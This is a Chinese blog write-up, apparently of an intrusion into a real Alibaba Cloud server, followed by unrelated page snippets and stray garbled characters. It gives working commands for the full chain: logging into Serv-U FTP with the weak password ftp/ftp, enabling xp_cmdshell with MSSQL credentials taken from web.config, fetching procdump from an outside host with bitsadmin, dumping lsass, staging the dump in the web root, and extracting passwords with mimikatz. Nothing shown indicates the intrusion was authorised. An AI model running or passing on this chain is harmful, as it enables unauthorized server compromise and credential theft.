ftp引發(fā)的一次滲透實(shí)戰(zhàn)

前言

無意中遇到ftp弱口令踏枣,以為沒什么卵用琴拧。沒想到一個(gè)小細(xì)節(jié)導(dǎo)致服務(wù)器直接搞定。

信息收集

IP為阿里云118.19.xx.xx徽缚、開放大量端口21,22,80,81,1433,3389,8888等等

ftp弱口令

指紋識(shí)別發(fā)現(xiàn)81端口為serv-u軟件贩汉。一個(gè)弱口令ftp/ftp直接登錄驱富。原以為ftp用來傳輸文件作用不大,沒想到無意中翻找到了web.config的敏感文件匹舞。

image.png

打開很明顯看到sql server的配置信息褐鸥。


image.png

mssql命令執(zhí)行

開啟xp_cmdshell組件

exec sp_configure 'show advanced options',1;reconfigure;
exec sp_configure 'xp_cmdshell',1;reconfigure;

直接執(zhí)行系統(tǒng)命令

exec master.dbo.xp_cmdshell  'whoami';
image.png

因?yàn)榘⒗镌品?wù)器的原因,想著直接激活guest用戶赐稽,結(jié)果在添加到管理員組的時(shí)候并沒有成功叫榕。查看進(jìn)程浑侥,發(fā)現(xiàn)存在防護(hù)aliyundun.exe

image.png

那采用prodump導(dǎo)出lsass.dmp,然后從web下載到本地晰绎,再使用mimikatz讀取密碼寓落。
此時(shí)有一個(gè)問題,web的絕對(duì)路徑還不知道荞下。

web路徑查找

該IP的8888端口正常運(yùn)行著web服務(wù)伶选,為一login.aspx登錄地址。
dir搜索logon.aspx

exec master.dbo.xp_cmdshell  'cd /d E: && dir /b /s Logon.aspx'
image.png

找到網(wǎng)站絕對(duì)路徑尖昏,就簡單啦~

dump hash

從公網(wǎng)上下載prodump.exe下載到靶機(jī)上仰税。

exec master.dbo.xp_cmdshell  'bitsadmin /transfer myDownLoadJob /download /priority normal "http://144.34.xxx.xxx/procdump64.exe" "C:\\Windows\\system32\\procdump.exe"'
procdump.exe -accepteula -ma lsass.exe lsass.dmp

導(dǎo)出lsass.dmp

image.png

再copy lsass.dmp到網(wǎng)站根目錄下。需要重命名為txt后綴名抽诉。

exec master.dbo.xp_cmdshell  'copy lsass.dmp "E:\Program Files\DESS.Web\tmp.txt"'

需要注意的是:
因?yàn)閣indows文件夾名稱中間沒有空格陨簇,如果文件夾名(或者目錄名)中有空格,就必須加雙引號(hào)了
訪問tmp.txt下載掸鹅。然后本地的mimikatz讀取即可塞帐。

sekurlsa::minidump lsass.dmp
sekurlsa::logonPasswords full
image.png

總結(jié)

不要放過任何一個(gè)細(xì)節(jié)。而且這次成功滲透巍沙,我發(fā)現(xiàn)全程以靜默化狀態(tài)運(yùn)行葵姥,沒有掛馬,沒有惡意掃描句携。

最后編輯于
?著作權(quán)歸作者所有,轉(zhuǎn)載或內(nèi)容合作請(qǐng)聯(lián)系作者
禁止轉(zhuǎn)載榔幸,如需轉(zhuǎn)載請(qǐng)通過簡信或評(píng)論聯(lián)系作者。
  • 序言:七十年代末矮嫉,一起剝皮案震驚了整個(gè)濱河市削咆,隨后出現(xiàn)的幾起案子,更是在濱河造成了極大的恐慌蠢笋,老刑警劉巖拨齐,帶你破解...
    沈念sama閱讀 218,386評(píng)論 6 506
  • 序言:濱河連續(xù)發(fā)生了三起死亡事件,死亡現(xiàn)場(chǎng)離奇詭異昨寞,居然都是意外死亡瞻惋,警方通過查閱死者的電腦和手機(jī),發(fā)現(xiàn)死者居然都...
    沈念sama閱讀 93,142評(píng)論 3 394
  • 文/潘曉璐 我一進(jìn)店門援岩,熙熙樓的掌柜王于貴愁眉苦臉地迎上來歼狼,“玉大人,你說我怎么就攤上這事享怀∮鸱澹” “怎么了?”我有些...
    開封第一講書人閱讀 164,704評(píng)論 0 353
  • 文/不壞的土叔 我叫張陵,是天一觀的道長梅屉。 經(jīng)常有香客問我值纱,道長,這世上最難降的妖魔是什么履植? 我笑而不...
    開封第一講書人閱讀 58,702評(píng)論 1 294
  • 正文 為了忘掉前任计雌,我火速辦了婚禮,結(jié)果婚禮上玫霎,老公的妹妹穿的比我還像新娘。我一直安慰自己妈橄,他們只是感情好庶近,可當(dāng)我...
    茶點(diǎn)故事閱讀 67,716評(píng)論 6 392
  • 文/花漫 我一把揭開白布。 她就那樣靜靜地躺著眷蚓,像睡著了一般鼻种。 火紅的嫁衣襯著肌膚如雪。 梳的紋絲不亂的頭發(fā)上沙热,一...
    開封第一講書人閱讀 51,573評(píng)論 1 305
  • 那天叉钥,我揣著相機(jī)與錄音,去河邊找鬼篙贸。 笑死投队,一個(gè)胖子當(dāng)著我的面吹牛,可吹牛的內(nèi)容都是我干的爵川。 我是一名探鬼主播敷鸦,決...
    沈念sama閱讀 40,314評(píng)論 3 418
  • 文/蒼蘭香墨 我猛地睜開眼,長吁一口氣:“原來是場(chǎng)噩夢(mèng)啊……” “哼寝贡!你這毒婦竟也來了扒披?” 一聲冷哼從身側(cè)響起,我...
    開封第一講書人閱讀 39,230評(píng)論 0 276
  • 序言:老撾萬榮一對(duì)情侶失蹤圃泡,失蹤者是張志新(化名)和其女友劉穎碟案,沒想到半個(gè)月后,有當(dāng)?shù)厝嗽跇淞掷锇l(fā)現(xiàn)了一具尸體颇蜡,經(jīng)...
    沈念sama閱讀 45,680評(píng)論 1 314
  • 正文 獨(dú)居荒郊野嶺守林人離奇死亡价说,尸身上長有42處帶血的膿包…… 初始之章·張勛 以下內(nèi)容為張勛視角 年9月15日...
    茶點(diǎn)故事閱讀 37,873評(píng)論 3 336
  • 正文 我和宋清朗相戀三年,在試婚紗的時(shí)候發(fā)現(xiàn)自己被綠了澡匪。 大學(xué)時(shí)的朋友給我發(fā)了我未婚夫和他白月光在一起吃飯的照片熔任。...
    茶點(diǎn)故事閱讀 39,991評(píng)論 1 348
  • 序言:一個(gè)原本活蹦亂跳的男人離奇死亡,死狀恐怖唁情,靈堂內(nèi)的尸體忽然破棺而出疑苔,到底是詐尸還是另有隱情,我是刑警寧澤甸鸟,帶...
    沈念sama閱讀 35,706評(píng)論 5 346
  • 正文 年R本政府宣布惦费,位于F島的核電站兵迅,受9級(jí)特大地震影響,放射性物質(zhì)發(fā)生泄漏薪贫。R本人自食惡果不足惜恍箭,卻給世界環(huán)境...
    茶點(diǎn)故事閱讀 41,329評(píng)論 3 330
  • 文/蒙蒙 一、第九天 我趴在偏房一處隱蔽的房頂上張望瞧省。 院中可真熱鬧扯夭,春花似錦、人聲如沸鞍匾。這莊子的主人今日做“春日...
    開封第一講書人閱讀 31,910評(píng)論 0 22
  • 文/蒼蘭香墨 我抬頭看了看天上的太陽橡淑。三九已至构拳,卻和暖如春,著一層夾襖步出監(jiān)牢的瞬間梁棠,已是汗流浹背置森。 一陣腳步聲響...
    開封第一講書人閱讀 33,038評(píng)論 1 270
  • 我被黑心中介騙來泰國打工, 沒想到剛下飛機(jī)就差點(diǎn)兒被人妖公主榨干…… 1. 我叫王不留符糊,地道東北人凫海。 一個(gè)月前我還...
    沈念sama閱讀 48,158評(píng)論 3 370
  • 正文 我出身青樓,卻偏偏與公主長得像濒蒋,于是被迫代替她去往敵國和親盐碱。 傳聞我的和親對(duì)象是個(gè)殘疾皇子,可洞房花燭夜當(dāng)晚...
    茶點(diǎn)故事閱讀 44,941評(píng)論 2 355

推薦閱讀更多精彩內(nèi)容

  • 信息收集 弱口令登錄失敗沪伙。網(wǎng)站使用帝國cms7.2 弱口令登錄失敗瓮顽,使用帝國cms的通用漏洞,失敗围橡。在知道絕對(duì)路徑...
    Tide_諾言閱讀 9,709評(píng)論 22 56
  • 運(yùn)行操作 CMD命令:開始->運(yùn)行->鍵入cmd或command(在命令行里可以看到系統(tǒng)版本暖混、文件系統(tǒng)版本) CM...
    小沐子_IT閱讀 2,117評(píng)論 0 4
  • 命令簡介 cmd是command的縮寫.即命令行 。 雖然隨著計(jì)算機(jī)產(chǎn)業(yè)的發(fā)展翁授,Windows 操作系統(tǒng)的應(yīng)用越來...
    Littleston閱讀 3,319評(píng)論 0 12
  • 運(yùn)行操作 CMD命令:開始->運(yùn)行->鍵入cmd或command(在命令行里可以看到系統(tǒng)版本拣播、文件系統(tǒng)版本) CM...
    小明yz閱讀 2,760評(píng)論 0 8
  • 一套實(shí)用的滲透測(cè)試崗位面試題,你會(huì)嗎收擦? 1.拿到一個(gè)待檢測(cè)的站贮配,你覺得應(yīng)該先做什么? 收集信息 whois塞赂、網(wǎng)站源...
    g0閱讀 4,833評(píng)論 0 9